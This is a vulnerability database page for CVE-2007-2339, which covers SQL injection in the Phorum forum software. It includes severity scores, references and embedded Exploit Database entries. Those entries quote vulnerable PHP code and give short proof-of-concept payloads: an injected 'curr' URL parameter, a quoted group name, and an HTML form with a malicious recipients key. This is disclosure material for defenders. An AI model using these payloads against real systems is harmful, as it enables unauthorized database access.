CVE-2007-2339 : Detail

CVE-2007-2339

0.85%V3
Network
2007-04-27
14h00 +00:00
2018-10-16
12h57 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Multiple SQL injection vulnerabilities in Phorum before 5.1.22 allow remote attackers to execute arbitrary SQL commands via (1) a modified recipients parameter name in (a) pm.php; (2) the curr parameter to the (b) badwords (aka censorlist) or (c) banlist module in admin.php; or (3) the "Edit groups / Add group" field in the (d) groups module in admin.php.

CVE Informations

Metrics

Metrics Score Severity CVSS Vector Source
V2 7.5 AV:N/AC:L/Au:N/C:P/I:P/A:P [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 29893

Publication date : 2007-04-22 22h00 +00:00
Author : Janek Vind
EDB Verified : Yes

source: https://www.securityfocus.com/bid/23616/info Phorum is prone to multiple input-validation vulnerabilities, including an unauthorized-access issue, privilege-escalation issue, multiple SQL-injection issues, and cross-site scripting issues, because the application fails to sufficiently sanitize user-supplied input. Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify sensitive data, or exploit latent vulnerabilities in the underlying database implementation. Phorum 5.1.20 is affected; prior versions may also be vulnerable. > From source code - "include/db/mysql.php" line 3223: -------------------------------------------------- function phorum_db_del_banitem($banid) { $PHORUM = $GLOBALS["PHORUM"]; $conn = phorum_db_mysql_connect(); $sql = "DELETE FROM {$PHORUM['banlist_table']} WHERE id = $banid"; $res = mysql_query($sql, $conn); --------------------------------------------------- PoC: http://localhost/phorum.5.1.20/admin.php?module=banlist&delete=1&curr=OR ... and we will get error message: <!-- You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'OR' at line 1: DELETE FROM phorum_banlists WHERE id = OR -->
Exploit Database EDB-ID : 29894

Publication date : 2007-04-22 22h00 +00:00
Author : Janek Vind
EDB Verified : Yes

source: https://www.securityfocus.com/bid/23616/info Phorum is prone to multiple input-validation vulnerabilities, including an unauthorized-access issue, privilege-escalation issue, multiple SQL-injection issues, and cross-site scripting issues, because the application fails to sufficiently sanitize user-supplied input. Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify sensitive data, or exploit latent vulnerabilities in the underlying database implementation. Phorum 5.1.20 is affected; prior versions may also be vulnerable. Let's try to add group named "war'axe": http://localhost/phorum.5.1.20/admin.php?module=groups Edit groups / Add group --> war'axe <!-- You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'axe')' at line 1: insert into phorum_groups (name) values ('war'axe') -->
Exploit Database EDB-ID : 29892

Publication date : 2007-04-22 22h00 +00:00
Author : Janek Vind
EDB Verified : Yes

source: https://www.securityfocus.com/bid/23616/info Phorum is prone to multiple input-validation vulnerabilities, including an unauthorized-access issue, privilege-escalation issue, multiple SQL-injection issues, and cross-site scripting issues, because the application fails to sufficiently sanitize user-supplied input. Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify sensitive data, or exploit latent vulnerabilities in the underlying database implementation. Phorum 5.1.20 is affected; prior versions may also be vulnerable. Let's look at source code of "include/db/mysq.php" ~ line 1881 : ------------------[source code]---------------------- function phorum_db_user_get($user_id, $detailed) { $PHORUM = $GLOBALS["PHORUM"]; $conn = phorum_db_mysql_connect(); if(is_array($user_id)){ $user_ids=implode(",", $user_id); } else { $user_ids=(int)$user_id; } $users = array(); $sql = "select * from {$PHORUM['user_table']} where user_id in ($user_ids)"; $res = mysql_query($sql, $conn); if ($err = mysql_error()) phorum_db_mysql_error("$err: $sql"); ------------------[/source code]---------------------- As we can see, if "$user_id" is array, then there is no sanitize against data before using in sql query. After some research I have found a way to use this bug for sql injection. For this, first of all, potential attacker must have valid user account in specific Phorum-powered website and he/she must be logged in. And then let's try this proof-of-concept html file: ------------------[PoC exploit]----------------------- <html> <body> <form action="http://localhost/phorum.5.1.20/pm.php" method="post"> <input type="hidden" name="recipients[1) OR foobar=123/* ]" value="waraxe"> <input type="submit" name"test" value="test"> </body> </html>

Products Mentioned

Configuraton 0

Phorum>>Phorum >> Version To (including) 5.1.20

References

http://www.phorum.org/story.php?76
Tags : x_refsource_CONFIRM
http://securitytracker.com/id?1017936
Tags : vdb-entry, x_refsource_SECTRACK
http://osvdb.org/35062
Tags : vdb-entry, x_refsource_OSVDB
http://www.vupen.com/english/advisories/2007/1479
Tags : vdb-entry, x_refsource_VUPEN
http://secunia.com/advisories/24932
Tags : third-party-advisory, x_refsource_SECUNIA
http://securityreason.com/securityalert/2617
Tags : third-party-advisory, x_refsource_SREASON
http://www.securityfocus.com/bid/23616
Tags : vdb-entry, x_refsource_BID
http://osvdb.org/35064
Tags : vdb-entry, x_refsource_OSVDB
http://osvdb.org/35063
Tags : vdb-entry, x_refsource_OSVDB